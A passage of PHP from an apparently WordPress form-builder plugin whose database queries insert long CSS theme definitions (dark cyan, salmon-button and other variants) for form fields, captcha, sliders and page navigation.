0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #640B0B;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #942323;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #752D2D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #9A0B0B  0%, #7B2828 39%, #752D2D 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #9A0B0B ), color-stop(39%, #7B2828 ), color-stop(100%, #752D2D )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height:18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/02/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(11, \'Theme 03 dark cyan\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #0B7A97;\r\nmargin-bottom: 10px;\r\ncolor: #0B7A97;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #2796B3 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/03/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n.button-submit {\r\nbackground: #0B7A97;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #18627C;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #56B4D5;\r\nfont-family: Segoe UI;\r\n}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/03/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\ncolor: #555;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #0C6177;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #2796B3;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #752D2D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0E6378 ), color-stop(39%, #2C7487 ), color-stop(100%, #2D7587 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height:18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/03/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(12, \'Theme 03 transparent (salmon button)\', \'.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D8D6D7;\r\nborder: 1px solid #D8D6D7;\r\nmargin-bottom: 10px;\r\ncolor: #D8D6D7;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #FA8072 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: 